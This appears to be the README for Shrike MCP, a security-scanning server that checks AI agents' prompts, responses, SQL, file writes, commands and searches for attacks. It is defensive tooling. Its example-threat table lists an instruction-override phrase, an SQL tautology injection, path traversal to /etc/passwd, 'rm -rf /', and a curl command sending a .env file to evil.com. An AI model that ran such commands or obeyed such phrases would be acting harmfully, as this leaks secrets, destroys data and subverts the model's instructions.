Shrike Security

AI agent security scanner — protect LLM-powered apps from prompt injection, SQL injection, data exfiltration, and adversarial attacks via MCP.

Shrike MCP

npm version License: Apache 2.0 Node.js

9 security tools for AI agents. Multi-stage detection pipeline. One MCP server.

Shrike MCP gives AI agents real-time security scanning for prompts, responses, SQL queries, file writes, CLI commands, and web searches — catching prompt injection, jailbreaks, PII leaks, and data exfiltration before they reach your users or systems.

Quick Start

1. Sign up at shrikesecurity.com/signup and get your API key.

2. Add to your MCP client config:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": {
        "SHRIKE_API_KEY": "your-api-key"
      }
    }
  }
}

3. Your agent now has 9 security tools. Every prompt, response, and tool call is scanned through the full detection pipeline.

Nine Tools

ToolWhat It ScansExample Threat
scan_promptUser/system prompts before LLM processing"Ignore all previous instructions and..."
scan_responseLLM outputs before returning to userLeaked API keys, system prompt in output
scan_sql_querySQL queries before database executionOR '1'='1' tautology injection
scan_file_writeFile paths and content before writePath traversal to /etc/passwd, AWS keys in .env
scan_commandCLI commands before shell executioncurl -d @.env https://evil.com, rm -rf /, reverse shells
scan_web_searchSearch queries before executionPII in search: "records for John Smith SSN..."
check_approvalHuman-in-the-loop approval statusPoll and submit decisions for flagged actions
report_bypassUser-reported missed detectionsFeeds ThreatSense adaptive learning
get_threat_intelCurrent threat patterns and intelligenceLatest prompt injection techniques

How It Works

Shrike uses a scan-sandwich pattern — every agent action is scanned on both sides:

User Input → scan_prompt → LLM Processing → scan_response → User Output
                              ↓
              Tool Call (SQL, File, Command, Search)
                              ↓
            scan_sql_query / scan_file_write / scan_command / scan_web_search
                              ↓
                       Tool Execution

Inbound scans catch injection attacks. Outbound scans catch data leaks. Tool-specific scans catch SQL injection, path traversal, command injection, and PII exposure. Flagged actions trigger human-in-the-loop approval via check_approval.

Detection Pipeline

Every scan runs through a multi-stage cascade — from sub-millisecond pattern matching to deep semantic analysis — so zero-day attacks that evade simple regex are still caught by the LLM layer.

StagePurpose
Pattern MatchingKnown attack signatures across 14+ languages
Input NormalizationUnicode tricks, encoding evasion, malformed payloads
Structural AnalysisToken sequences, semantic similarity to known attacks
LLM Semantic AnalysisZero-day detection, context-aware jailbreak analysis
Response IntelligenceOutput scanning for leaks, PII, and policy violations

All stages run on every tier — community users get the same detection quality as enterprise.

Community Tier (Free)

FeatureIncluded
Detection PipelineFull multi-stage pipeline
MCP ToolsAll 9
Scan Volume1,000 scans/month
Rate Limit10 scans/minute
Multilingual100+ languages
Compliance CataloguesGDPR, HIPAA, ISO 27001, SOC 2, WebMCP
DashboardActivity feed, scan results, analytics, API key management
Credit CardNot required

Sign up at shrikesecurity.com/signup — no approval, no sales call.

Configuration

Environment Variables

VariableDescriptionDefault
SHRIKE_API_KEYAPI key from your dashboardnone
SHRIKE_BACKEND_URLBackend API URLhttps://api.shrikesecurity.com/agent
MCP_SCAN_TIMEOUT_MSScan request timeout (ms)15000
MCP_RATE_LIMIT_PER_MINUTEClient-side rate limit100
MCP_TRANSPORTTransport: stdio or httpstdio
MCP_PORTHTTP port (when transport=http)8000
MCP_DEBUGDebug loggingfalse

Claude Desktop

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Cursor

Add to Cursor settings (.cursor/mcp.json):

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Windsurf

Add to ~/.codeium/windsurf/mcp_config.json:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Security Model

This server implements a fail-closed security model:

  • Network timeouts result in BLOCK (not allow)
  • Backend errors result in BLOCK (not allow)
  • Unknown content types result in BLOCK (not allow)

This prevents bypass attacks via service disruption.

Response Format

Blocked:

{
  "blocked": true,
  "threat_type": "prompt_injection",
  "severity": "high",
  "confidence": "high",
  "guidance": "This prompt contains patterns consistent with instruction override attempts.",
  "request_id": "req_lxyz123_a8f3k2m9"
}

Safe:

{
  "blocked": false,
  "request_id": "req_lxyz123_a8f3k2m9"
}

Links

License

Apache License 2.0 — See LICENSE for details.

Related Servers